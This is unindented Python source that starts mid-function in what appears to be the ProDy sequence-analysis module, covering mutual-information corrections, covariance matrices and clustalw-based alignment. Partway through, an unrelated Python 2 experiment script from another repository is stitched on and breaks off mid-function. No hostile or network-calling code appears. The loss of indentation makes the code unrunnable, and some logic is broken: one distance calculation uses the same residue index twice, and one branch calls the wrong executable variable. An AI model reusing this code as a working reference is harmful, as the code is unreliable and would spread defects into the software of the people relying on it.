If *count* is **True**, count of non-gap characters will be returned.
Implementation is case insensitive."""
from .msatools import msaocc
msa = getMSA(msa)
try:
dim = occ.startswith('res') or occ.startswith('col')
except AttributeError:
raise TypeError('occ must be a string')
occ = zeros(msa.shape[int(dim)], float)
return msaocc(msa, occ, dim, count=bool(count))
def applyMutinfoNorm(mutinfo, entropy, norm='sument'):
"""Apply one of the normalizations discussed in [MLC05]_ to *mutinfo*
matrix. *norm* can be one of the following:
* ``'sument'``: :math:`H(X) + H(Y)`, sum of entropy of columns
* ``'minent'``: :math:`min\{H(X), H(Y)\}`, minimum entropy
* ``'maxent'``: :math:`max\{H(X), H(Y)\}`, maximum entropy
* ``'mincon'``: :math:`min\{H(X|Y), H(Y|X)\}`, minimum conditional
entropy
* ``'maxcon'``: :math:`max\{H(X|Y), H(Y|X)\}`, maximum conditional
entropy
where :math:`H(X)` is the entropy of a column, and
:math:`H(X|Y) = H(X) - MI(X, Y)`. Normalization with joint entropy, i.e.
:math:`H(X, Y)`, can be done using :func:`.buildMutinfoMatrix` *norm*
argument.
.. [MLC05] <NAME>, <NAME>, <NAME>, <NAME>. Using information theory
to search for co-evolving residues in proteins. *Bioinformatics*
**2005** 21(22):4116-4124."""
try:
ndim, shape = mutinfo.ndim, mutinfo.shape
except AttributeError:
raise TypeError('mutinfo must be a 2D square array')
if ndim != 2 or shape[0] != shape[1]:
raise ValueError('mutinfo must be a 2D square array')
try:
ndim, shapent = entropy.ndim, entropy.shape
except AttributeError:
raise TypeError('entropy must be a numpy array')
if ndim != 1:
raise ValueError('entropy must be a 1D array')
if shapent[0] != shape[0]:
raise ValueError('shape of mutinfo and entropy does not match')
try:
sw = norm.startswith
except AttributeError:
raise TypeError('norm must be a string')
if sw('sument'):
norm = lambda i_val, j_val, val: i_val + j_val
elif sw('minent'):
norm = lambda i_val, j_val, val: min(i_val, j_val)
elif sw('maxent'):
norm = lambda i_val, j_val, val: max(i_val, j_val)
elif sw('mincon'):
norm = lambda i_val, j_val, val: min(i_val - val, j_val - val)
elif sw('maxcon'):
norm = lambda i_val, j_val, val: max(i_val - val, j_val - val)
elif sw('joint'):
raise ValueError('for joint entropy normalization, use '
'buildMutinfoMatrix function')
else:
raise ValueError('norm={0} is not a valid normalization type'
.format(norm))
mi = mutinfo.copy()
for i, i_val in enumerate(entropy):
for j, j_val in enumerate(entropy):
val = mi[i, j]
div = norm(i_val, j_val, val)
if div == 0:
mi[i, j] = 0
else:
mi[i, j] /= div
return mi
def applyMutinfoCorr(mutinfo, corr='prod'):
"""Returns a copy of *mutinfo* array after average product correction
(default) or average sum correction is applied. See [DSD08]_ for details.
.. [DSD08] <NAME>, <NAME>, <NAME>. Mutual information without the
influence of phylogeny or entropy dramatically improves residue
contact prediction. *Bioinformatics* **2008** 24(3):333-340."""
try:
ndim, shape = mutinfo.ndim, mutinfo.shape
except AttributeError:
raise TypeError('mutinfo must be a 2D square array')
if ndim != 2 or shape[0] != shape[1]:
raise ValueError('mutinfo must be a 2D square array')
try:
sw = corr.startswith
except AttributeError:
raise TypeError('correction must be a string')
avg_mipos = mutinfo.sum(1) / (shape[0] - 1)
avg_mi = avg_mipos.mean()
mi = mutinfo.copy()
if sw('prod') or sw('apc'):
for i, i_avg in enumerate(avg_mipos):
for j, j_avg in enumerate(avg_mipos):
mi[i, j] -= (i_avg * j_avg) / avg_mi
elif sw('sum') or sw('asc'):
for i, i_avg in enumerate(avg_mipos):
for j, j_avg in enumerate(avg_mipos):
mi[i, j] -= i_avg + j_avg - avg_mi
else:
raise ValueError('correction must be prod or sum, not ' + corr)
return mi
def filterRankedPairs(pdb, indices, msa_indices, rank_row, rank_col, zscore_sort, \
num_of_pairs=20, seqDistance=5, resi_range=None, \
pdbDistance=8, chain1='A', chain2='A'):
'''
indices and msa_indices are lists output from alignSequenceToMSA
rank_row, rank_col and zscore_sort are the outputs from calcRankorder
:arg num_of_pairs: The number of pairs to be output, if no value is given
then all pairs are output. Default is 20
:type num_of_pairs: int
:arg seqDistance: Remove pairs that are closer than this in the reference sequence
Default is 5
:type seqDistance: int
:arg pdbDistance: Remove pairs with Calpha atoms further apart than this in the PDB
Default is 8
:type pdbDistance: int
:arg chain1: The chain used for the residue specified by rank_row when measuring distances
:type chain1: str
:arg chain2: The chain used for the residue specified by rank_col when measuring distances
:type chain2: str
'''
if isscalar(indices):
raise TypeError('Please provide a valid indices list')
if isscalar(msa_indices):
raise TypeError('Please provide valid msa_indices, which should be a list')
if isscalar(rank_row):
raise TypeError('Please provide ranked row from calcRankorder')
if isscalar(rank_col):
raise ValueError('Please provide ranked col from calcRankorder')
if isscalar(zscore_sort):
raise ValueError('Please provide sorted Z scores from calcRankorder')
if num_of_pairs is None:
num_of_pairs = len(rank_row)
pairList = []
i = -1
j = 0
while j < num_of_pairs:
i += 1
row_idx = indices[where(msa_indices == rank_row[i])[0][0]]
col_idx = indices[where(msa_indices == rank_col[i])[0][0]]
if not isinstance(row_idx, Integral) or not isinstance(col_idx, Integral):
continue
if row_idx - col_idx < seqDistance:
continue
distance = calcDistance(pdb.select('chain %s and resid %s' % (chain1, \
row_idx)).copy(), \
pdb.select('chain %s and resid %s' % (chain2, \
row_idx)).copy())
if distance > pdbDistance:
continue
if resi_range is not None:
if not row_idx in resi_range and not col_idx in resi_range:
continue
pairList.append('%3d:\t%3d\t%3d\t%5.1f\t%5.1f\n'%(i, row_idx, col_idx, zscore_sort[i], distance))
j += 1
return pairList
def buildSeqidMatrix(msa, turbo=True):
"""Returns sequence identity matrix for *msa*."""
msa = getMSA(msa)
LOGGER.timeit('_seqid')
from .seqtools import msaeye
dim = msa.shape[0]
seqid = msaeye(msa, ones((dim, dim), float), turbo=bool(turbo))
LOGGER.report('Sequence identity matrix was calculated in %.2fs.',
'_seqid')
return seqid
buildSeqidMatrix.__doc__ += doc_turbo
def uniqueSequences(msa, seqid=0.98, turbo=True):
"""Returns a boolean array marking unique sequences in *msa*. A sequence
sharing sequence identity of *seqid* or more with another sequence coming
before itself in *msa* will have a **True** value in the array."""
msa = getMSA(msa)
from .seqtools import msaeye
if not (0 < seqid <= 1):
raise ValueError('seqid must satisfy 0 < seqid <= 1')
return msaeye(msa, zeros(msa.shape[0], bool),
unique=seqid, turbo=bool(turbo))
uniqueSequences.__doc__ += doc_turbo
def calcRankorder(matrix, zscore=False, **kwargs):
"""Returns indices of elements and corresponding values sorted in
descending order, if *descend* is **True** (default). Can apply a zscore
normalization; by default along *axis* - 0 such that each column has
``mean=0`` and ``std=1``. If *zcore* analysis is used, return value contains the
zscores. If matrix is symmetric only lower triangle indices will be
returned, with diagonal elements if *diag* is **True** (default)."""
try:
ndim, shape = matrix.ndim, matrix.shape
except AttributeError:
raise TypeError('matrix must be a 2D array')
if ndim != 2:
raise ValueError('matrix must be a 2D array')
threshold = kwargs.get('thredhold', 0.0001)
try:
symm = abs((matrix.transpose() - matrix).max()) < threshold
except:
symm = False
if zscore:
axis = int(bool(kwargs.get('axis', 0)))
matrix = (matrix - matrix.mean(axis)) / matrix.std(axis)
LOGGER.info('Zscore normalization has been applied.')
descend = kwargs.get('descend', True)
if not symm:
if descend:
sorted_index = matrix.argsort(axis=None)[::-1]
else:
sorted_index = matrix.argsort(axis=None)
row = indices(shape)[0].flatten()[sorted_index]
column = indices(shape)[1].flatten()[sorted_index]
else:
LOGGER.info('Matrix is symmetric, only lower triangle indices '
'will be returned.')
if kwargs.get('diag', True):
k = 0
else:
k = -1
ind_row, ind_column = tril_indices(shape[0], k=k)
matrix_lt = matrix[ind_row, ind_column]
if descend:
sorted_index = matrix_lt.argsort(axis=None)[::-1]
else:
sorted_index = matrix_lt.argsort(axis=None)
row = ind_row[sorted_index]
column = ind_column[sorted_index]
return (row, column, matrix[row, column])
def buildOMESMatrix(msa, ambiguity=True, turbo=True, **kwargs):
"""Returns OMES (Observed Minus Expected Squared) covariance matrix
calculated for *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. OMES is defined as::
(N_OBS - N_EX)^2 (f_i,j - f_i * f_j)^2
OMES_(i,j) = sum(------------------) = N * sum(-----------------------)
N_EX f_i * f_j
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""
msa = getMSA(msa)
from .msatools import msaomes
LOGGER.timeit('_omes')
length = msa.shape[1]
omes = empty((length, length), float)
omes = msaomes(msa, omes, ambiguity=bool(ambiguity), turbo=bool(turbo),
debug=bool(kwargs.get('debug', False)))
LOGGER.report('OMES matrix was calculated in %.2fs.',
'_omes')
return omes
buildOMESMatrix.__doc__ += doc_turbo
def buildSCAMatrix(msa, turbo=True, **kwargs):
"""Returns SCA matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""
msa = getMSA(msa)
if msa.shape[0]<100:
LOGGER.warning('SCA performs the best with higher number of sequences, and '
'minimal number of sequences is recommended as 100.')
from .msatools import msasca
LOGGER.timeit('_sca')
length = msa.shape[1]
sca = zeros((length, length), float)
sca = msasca(msa, sca, turbo=bool(turbo))
LOGGER.report('SCA matrix was calculated in %.2fs.', '_sca')
return sca
buildSCAMatrix.__doc__ += doc_turbo
def buildPCMatrix(msa, turbo=False, **kwargs):
"""Returns PC matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
"""
msa = getMSA(msa)
from .msatools import msapsicov
LOGGER.timeit('_psicov')
length = msa.shape[1]
pc = zeros((length, length), float)
pc = msapsicov(msa, pc, turbo=bool(turbo))
LOGGER.report('PC matrix was calculated in %.2fs.', '_psicov')
return pc
def buildDirectInfoMatrix(msa, seqid=.8, pseudo_weight=.5, refine=False,
**kwargs):
"""Returns direct information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences for calculating their weights
using :func:`.calcMeff`.
*pseudo_weight* are the weight for pseudo count probability.
Sequences are not refined by default. When *refine* is set **True**,
the MSA will be refined by the first sequence and the shape of direct
information matrix will be smaller.
"""
msa = getMSA(msa)
from .msatools import msadipretest, msadirectinfo1, msadirectinfo2
from numpy import matrix
LOGGER.timeit('_di')
if msa.shape[0]<250:
LOGGER.warning('DI performs the best with higher number of sequences, and '
'minimal number of sequences is recommended as 250.')
refine = 1 if refine else 0
# msadipretest get some parameter from msa to set matrix size
length, q = msadipretest(msa, refine=refine)
c = matrix.dot(matrix(zeros((length*q, 1), float)),
matrix(zeros((1, length*q), float)))
prob = zeros((length, q+1), float)
# msadirectinfo1 return c to be inversed and prob to be used
meff, n, length, c, prob = msadirectinfo1(msa, c, prob, theta=1.-seqid,
pseudocount_weight=pseudo_weight,
refine=refine, q=q+1)
c = c.I
di = zeros((length, length), float)
# get final DI
di = msadirectinfo2(n, length, c, prob, di, q+1)
del prob, c
LOGGER.report('DI matrix was calculated in %.2fs.', '_di')
return di
def calcMeff(msa, seqid=.8, refine=False, weight=False, **kwargs):
"""Returns the Meff for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Since similar sequences in an *msa* decreases the diversity of *msa*,
*Meff* gives a weight for sequences in the *msa*.
For example: One sequence in MSA has 5 other similar sequences in this
MSA(itself included). The weight of this sequence is defined as 1/5=0.2.
Meff is the sum of all sequence weights. In another word, Meff can be
understood as the effective number of independent sequences.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences to calculate Meff.
Sequences are not refined by default. When *refine* is set **True**, the
MSA will be refined by the first sequence.
The weight for each sequence are returned when *weight* is **True**."""
msa = getMSA(msa)
from .msatools import msameff
LOGGER.timeit('_meff')
refine = 1 if refine else 0
weight = 0 if weight else 1 # A Mark for return weighted array.
if (not weight):
w = zeros((msa.shape[0]), float)
meff = msameff(msa, theta=1.-seqid, meff_only=weight,
refine=refine, w=w)
else:
meff = msameff(msa, theta=1.-seqid, meff_only=weight, refine=refine)
LOGGER.report('Meff was calculated in %.2fs.', '_meff')
return meff
def alignSequencesByChain(PDBs, **kwargs):
"""
Runs :func:`buildMSA` for each chain and optionally joins the results.
Returns either a single :class:`MSA` or a dictionary containing an :class:`MSA` for each chain.
:arg PDBs: a list of :class:`AtomGroup` objects
:type PDBs: list
:arg join_chains: whether to join chain alignments
default is True
:type join_chains: bool
:arg join_char: a character for joining chain alignments
default is '/' as used by PIR format alignments
:type join_char: str
"""
if isscalar(PDBs):
raise TypeError('PDBs should be array-like')
if not PDBs:
raise ValueError('PDBs should not be empty')
pdbs = []
chains = []
for i, pdb in enumerate(PDBs):
if isinstance(pdb, Atomic):
pdbs.append(pdb)
else:
raise TypeError('each entry in PDBs must be a :class:`Atomic` instance')
chains.append([])
for chain in list(pdbs[i].getHierView()):
chains[i].append(chain)
if i != 0 and len(chains[i]) != len(chains[0]):
raise ValueError('all pdbs should have the same number of chains')
labels = []
for pdb in pdbs:
chids = ''
for chain in list(pdb.getHierView()):
chids += chain.getChid()
labels.append(pdb.getTitle() + '_' + chids)
chains = array(chains)
chain_alignments = []
alignments = {}
for j in range(len(chains[0])):
prefix = 'chain_' + chains[0, j].getChid()
msa = buildMSA(chains[:, j], title=prefix, labels=labels)
msa = refineMSA(msa, colocc=1e-9) # remove gap-only cols
chain_alignments.append(msa)
alignments[labels[0].split('_')[1][j]] = msa
join_chains = kwargs.get('join_chains', True)
join_char = kwargs.get('join_char', '/')
if len(chains[0]) == 1:
join_chains = False
if join_chains:
joined_msaarr = []
for i, chain_alignment in enumerate(chain_alignments):
pdb_seqs = []
for j, sequence in enumerate(chain_alignment):
pdb_seqs.append(sequence)
joined_msaarr.append(join_char.join(pdb_seqs))
result = MSA(joined_msaarr, title='joined_chains',
labels=[label.split('_')[0] for label in labels])
else:
result = alignments
if len(result) == 1:
result = result[list(result.keys())[0]]
return result
def buildMSA(sequences, title='Unknown', labels=None, **kwargs):
"""
Aligns sequences with clustalw or clustalw2 and returns the resulting MSA.
:arg sequences: a file, MSA object or a list or array containing sequences
as Atomic objects with :func:`getSequence` or Sequence objects or strings.
If strings are used then labels must be provided using ``labels``
:type sequences: :class:`Atomic`, :class:`.MSA`,
:class:`~numpy.ndarray`, str
:arg title: the title for the MSA and it will be used as the prefix for output files.
:type title: str
:arg labels: a list of labels to go with the sequences
:type labels: list
:arg align: whether to align the sequences
default True
:type align: bool
:arg method: alignment method, one of either 'global' (biopython.pairwise2.align.globalms),
'local' (biopython.pairwise2.align.localms), clustalw(2), or another software in your path.
Default is 'clustalw'
:type align: str
"""
align = kwargs.get('align', True)
method = kwargs.pop('method', 'clustalw')
# 1. check if sequences are in a fasta file and if not make one
if isinstance(sequences, str):
filename = sequences
elif not isinstance(sequences, MSA):
try:
max_len = 0
for sequence in sequences:
if isinstance(sequence, Atomic):
if len(sequence.ca.copy()) > max_len:
max_len = len(sequence.ca.copy())
elif isinstance(sequence, MSA):
if len(sequence[0]) > max_len:
max_len = len(sequence[0])
else:
if len(sequence) > max_len:
max_len = len(sequence)
msa = []
fetched_labels = []
for i, sequence in enumerate(sequences):
if isinstance(sequence, Atomic):
strseq = sequence.ca.getSequence()
label = sequence.getTitle()
elif isinstance(sequence, Sequence):
strseq = str(sequence)
label = sequence.getLabel()
elif isinstance(sequence, MSA):
strseq = str(sequence[0])
label = sequence.getLabel(0)
LOGGER.warn('Only the first sequence in the MSA at entry {0} is used.'
.format(i))
elif isinstance(sequence, str):
strseq = sequence
label = str(i + 1)
else:
raise TypeError('sequences should be a list of strings, '
'Atomic, or Sequence instances')
strseq = strseq + '-'*(max_len - len(strseq))
msa.append(array(list(strseq)))
fetched_labels.append(label)
sequences = array(msa)
except:
raise TypeError('sequences should be iterable')
# "if a list" is a pythonic way to check if a list is empty or not (or none)
if not labels and fetched_labels:
labels = fetched_labels
label = [label.replace(' ','_') for label in labels]
# labels checkers are removed because they will be properly handled in MSA class initialization
msa = MSA(msa=sequences, title=title, labels=labels)
if align and 'clustal' in method:
filename = writeMSA(title + '.fasta', msa)
if align:
# 2. find and run alignment method
if method in ['biopython', 'local', 'global']:
if len(sequences) == 2:
msa, _, _ = alignTwoSequencesWithBiopython(sequences[0], sequences[1], **kwargs)
else:
raise ValueError("Provide only two sequences or another method. \
Biopython pairwise alignment can only be used \
to build an MSA with two sequences.")
elif 'clustalw' in method:
clustalw = which('clustalw')
if clustalw is None:
if which('clustalw2') is not None:
clustalw = which('clustalw2')
else:
raise EnvironmentError("The executable for clustalw was not found, \
install clustalw or add it to the path.")
os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename))
# 3. parse and return the new MSA
msa = parseMSA(title + '.aln')
else:
alignTool = which(method)
if alignTool is None:
raise EnvironmentError("The executable for {0} was not found, \
install it or add it to the path.".format(alignTool))
os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename))
# 3. parse and return the new MSA
msa = parseMSA(title + '.aln')
return msa
def showAlignment(alignment, **kwargs):
"""
Prints out an alignment as sets of short rows with labels.
:arg alignment: any object with aligned sequences
:type alignment: :class: `.MSA`, list
:arg row_size: the size of each row
default 60
:type row_size: int
:arg indices: a set of indices for some or all sequences
that will be shown above the relevant sequences
:type indices: :class:`~numpy.ndarray`, list
:arg index_start: how far along the alignment to start putting indices
default 0
:type index_start: int
:arg index_stop: how far along the alignment to stop putting indices
default the point when the shortest sequence stops
:type index_stop: int
:arg labels: a list of labels
:type labels: list
"""
row_size = kwargs.get('row_size', 60)
labels = kwargs.get('labels', None)
if labels is not None:
if isscalar(labels):
raise TypeError('labels should be array-like')
for label in labels:
if not isinstance(label, str):
raise TypeError('each label should be a string')
if len(labels) < len(alignment):
raise ValueError('there should be a label for every sequence shown')
else:
labels = []
for i, sequence in enumerate(alignment):
if hasattr(sequence, 'getLabel'):
labels.append(sequence.getLabel())
else:
labels.append(str(i+1))
indices = kwargs.get('indices', None)
index_start = kwargs.get('index_start', 0)
index_stop = kwargs.get('index_stop', 0)
if index_stop == 0 and indices is not None:
locs = []
maxes = []
for index in indices:
int_index = []
for i in index:
if i == '':
int_index.append(0)
else:
int_index.append(int(i))
int_index = array(int_index)
maxes.append(max(int_index))
locs.append(where(int_index == max(int_index))[0][0])
index_stop = locs[where(maxes == min(maxes))[0][0]]
for i in range(int(ceil(len(alignment[0])/float(row_size)))):
for j in range(len(alignment)):
if indices is not None:
sys.stdout.write('\n' + ' '*15 + '\t')
for k in range(row_size*i+10,row_size*(i+1)+10,10):
try:
if k > index_start + 10 and k < index_stop + 10:
sys.stdout.write('{:10d}'.format(int(indices[j][k-1])))
elif k < index_stop:
sys.stdout.write(' '*(k-index_start))
else:
sys.stdout.write(' '*10)
except:
sys.stdout.write(' '*10)
sys.stdout.write('\n')
sys.stdout.write(labels[j][:15] + \
' ' * (15-len(labels[j][:15])) + \
'\t' + str(alignment[j])[60*i:60*(i+1)] + '\n')
sys.stdout.write('\n')
return
def alignSequenceToMSA(seq, msa, **kwargs):
"""
Align a sequence from a PDB or Sequence to a sequence from an MSA
and create two sets of indices.
The sequence from the MSA (*seq*), the alignment and
the two sets of indices are returned.
The first set (*indices*) maps the residue numbers in the PDB to
the reference sequence. The second set (*msa_indices*) indexes the
reference sequence in the msa and is used for retrieving values
from the first indices.
:arg seq: an object with an associated sequence string
or a sequence string itself
:type seq: :class:`.Atomic`, :class:`.Sequence`, str
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
:arg label: a label for a sequence in msa or a PDB ID
``msa.getIndex(label)`` must return a sequence index
:type label: str
:arg chain: which chain from pdb to use for alignment, default is **None**,
which does no selection on *seq*. This value will be ignored if seq is
not an :class:`.Atomic` object.
:type chain: str
Parameters for Biopython ``pairwise2`` alignments can be provided as
keyword arguments. Default values are originally from ``proteins.compare``
module, but now found in ``utilities.seqtools``.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are ``"local"`` and ``"global"``
:type method: str
"""
label = kwargs.get('label', None)
chain = kwargs.get('chain', None)
match = kwargs.get('match', MATCH_SCORE)
mismatch = kwargs.get('mismatch', MISMATCH_SCORE)
gap_opening = kwargs.get('gap_opening', GAP_PENALTY)
gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY)
method = kwargs.get('method', ALIGNMENT_METHOD)
if isinstance(seq, Atomic):
if isinstance(chain, str):
ag = seq.select('chain {0}'.format(chain))
elif chain is None:
ag = seq
chids = ag.getChids()
if len(unique(chids)) > 1:
LOGGER.warn('%s consists of multiple chains. Please consider selecting one chain'%(seq.getTitle()))
else:
raise TypeError('chain should be a string or None')
if ag is None:
raise ValueError('seq may be None or chain ID may be invalid')
sequence = ag.select('ca').getSequence()
elif isinstance(seq, Sequence):
sequence = str(seq)
ag = None
elif isinstance(seq, str):
sequence = seq
ag = None
else:
raise TypeError('seq must be an atomic class, sequence class, or str not {0}'
.format(type(seq)))
if not isinstance(msa, MSA):
raise TypeError('msa must be an MSA instance')
if label is None:
if ag:
label = ag.getTitle().split('_')[0]
elif isinstance(seq, Sequence):
label = seq.getLabel()
else:
raise ValueError('A label cannot be extracted from seq so please provide one.')
index = msa.getIndex(label)
if index is None and (len(label) == 4 or len(label) == 5):
from prody import parsePDB
try:
structure, header = parsePDB(label[:4], header=True)
except Exception as err:
raise IOError('failed to parse header for {0} ({1})'
.format(label[:4], str(err)))
chid = chain
for poly in header['polymers']:
if chid and poly.chid != chid:
continue
for dbref in poly.dbrefs:
if index is None:
index = msa.getIndex(dbref.idcode)
if index is not None:
LOGGER.info('{0} idcode {1} for {2}{3} '
'is found in {4}.'.format(
dbref.database, dbref.idcode,
label[:4], poly.chid, str(msa)))
label = dbref.idcode
break
if index is None:
index = msa.getIndex(dbref.accession)
if index is not None:
LOGGER.info('{0} accession {1} for {2}{3} '
'is found in {4}.'.format(
dbref.database, dbref.accession,
label[:4], poly.chid, str(msa)))
label = dbref.accession
break
if index is not None:
chain = structure[poly.chid]
if index is None:
raise ValueError('label is not in msa, or msa is not indexed')
try:
len(index)
except TypeError:
pass
else:
raise ValueError('label {0} maps onto multiple sequences, '
'so cannot be used for refinement'.format(label))
if isinstance(index, int):
refMsaSeq = str(msa[index]).upper().replace('-','.')
else:
raise TypeError('The output from querying that label against msa is not a single sequence.')
if method == 'local':
alignment = pairwise2.align.localms(sequence, str(refMsaSeq),
match, mismatch, gap_opening, gap_extension,
one_alignment_only=1)
elif method == 'global':
alignment = pairwise2.align.globalms(sequence, str(refMsaSeq),
match, mismatch, gap_opening, gap_extension,
one_alignment_only=1)
else:
raise ValueError('method should be local or global')
seq_indices = [0]
msa_indices = [0]
for i in range(len(alignment[0][0])):
if alignment[0][0][i] != '-':
seq_indices.append(seq_indices[i]+1)
else:
seq_indices.append(seq_indices[i])
if alignment[0][1][i] != '-':
msa_indices.append(msa_indices[i]+1)
else:
msa_indices.append(msa_indices[i])
seq_indices.pop(0) # The first element was extra for initialisation
msa_indices.pop(0) # The first element was extra for initialisation
seq_indices = array(seq_indices)
msa_indices = array(msa_indices)
if ag:
seq_indices += ag.getResnums()[0] - 1
alignment = MSA(msa=array([array(list(alignment[0][0])), \
array(list(alignment[0][1]))]), \
labels=[ag.getTitle(), label])
return alignment, seq_indices, msa_indices
def alignTwoSequencesWithBiopython(seq1, seq2, **kwargs):
"""Easily align two sequences with Biopython's globalms or localms.
Returns an MSA and indices for use with :func:`.showAlignment`.
Alignment parameters can be provided as keyword arguments.
Default values are as originally set in the proteins.compare
module, but now found in utilities.seqtools.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are 'local' and 'global'
:type method: str
"""
match = kwargs.get('match', MATCH_SCORE)
mismatch = kwargs.get('mismatch', MISMATCH_SCORE)
gap_opening = kwargs.get('gap_opening', GAP_PENALTY)
gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY)
method = kwargs.get('method', ALIGNMENT_METHOD)
if method == 'local':
alignment = pairwise2.align.localms(seq1, seq2, match, mismatch, gap_opening, gap_extension)
elif method == 'global':
alignment = pairwise2.align.globalms(seq1, seq2, match, mismatch, gap_opening, gap_extension)
else:
raise ValueError('method should be local or global')
seq_indices = [0]
msa_indices = [0]
for i in range(len(alignment[0][0])):
if alignment[0][0][i] != '-':
seq_indices.append(seq_indices[i]+1)
else:
seq_indices.append(seq_indices[i])
if alignment[0][1][i] != '-':
msa_indices.append(msa_indices[i]+1)
else:
msa_indices.append(msa_indices[i])
seq_indices = array(seq_indices)
msa_indices = array(msa_indices)
alignment = MSA(msa=array([array(list(alignment[0][0])), \
array(list(alignment[0][1]))]))
return alignment, seq_indices, msa_indices
def trimAtomsUsingMSA(atoms, msa, **kwargs):
"""This function uses :func:`.alignSequenceToMSA` and has the same kwargs.
:arg atoms: an atomic structure for trimming
:type atoms: :class:`.Atomic`
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
"""
aln, idx_1, idx_2 = alignSequenceToMSA(atoms, msa, **kwargs)
u, i = unique(idx_2, return_index=True)
resnums_str = ' '.join([str(x) for x in idx_1[i]])
chain = kwargs.get('chain', 'A')
return atoms.select('chain {0} and resnum {1}'.format(chain, resnums_str))
|
tables/table-alter/old-fictitious-experiments.py | yash-srivastava19/sempre | 812 | 12686774 | <reponame>yash-srivastava19/sempre<filename>tables/table-alter/old-fictitious-experiments.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""DEPRECATED. Use fictitious-experiments.py instead."""
import sys, os, shutil, re, argparse, json, gzip
from codecs import open
from itertools import izip
from collections import defaultdict, Counter
def clean(x):
# Remove actual string from names
x = x.decode('utf8').replace(ur'\"', '')
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*)\)', r'(name \1)', x)
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) [^")]*\)', r'(name \1)', x)
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) "[^"]*"\)', r'(name \1)', x)
return x
def read_denotation_file(ex_id, fin):
"""Return n, k, d, denotations, grid"""
n, k, d = [int(x) for x in fin.readline().split()]
denotations = []
for i in xrange(d):
denotations.append(clean(fin.readline()[:-1]))
if not denotations:
print >> sys.stderr, 'Warning: no denotations - ', ex_id
elif denotations[0] == '(list)':
print >> sys.stderr, 'Warning: denotations[0] == (list) - ', ex_id
denotations.append(None)
grid = []
for i in xrange(n):
row = [denotations[int(x)] for x in fin.readline()[:-1].split()]
grid.append(row)
denotations.pop()
return n, k, d, denotations, grid
################################################
# Count number of equivalence classes
def process1(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
equiv_classes = {0: set(), 5: set(), 10: set(),
30: set(), 100: set(), 300: set()}
for row in grid:
row = tuple(row)
for num_tables, value in equiv_classes.items():
value.add(row[:num_tables+1])
fields = [ex_id, n, k, d]
for key, value in sorted(equiv_classes.items()):
fields.append(len(value))
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out how many are split from main class when going from 30 --> 300
def process2(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
thirties = defaultdict(Counter)
for row in grid:
row = tuple(row)
thirties[row[:31]][row[:301]] += 1
#thirties[row[:6]][row[:31]] += 1
cores = splits = 0
for key, value in thirties.items():
core = value.most_common(1)[0][1]
cores += core
splits += (sum(value.values()) - core)
fields = [ex_id, n, k, d, len(thirties), cores, splits]
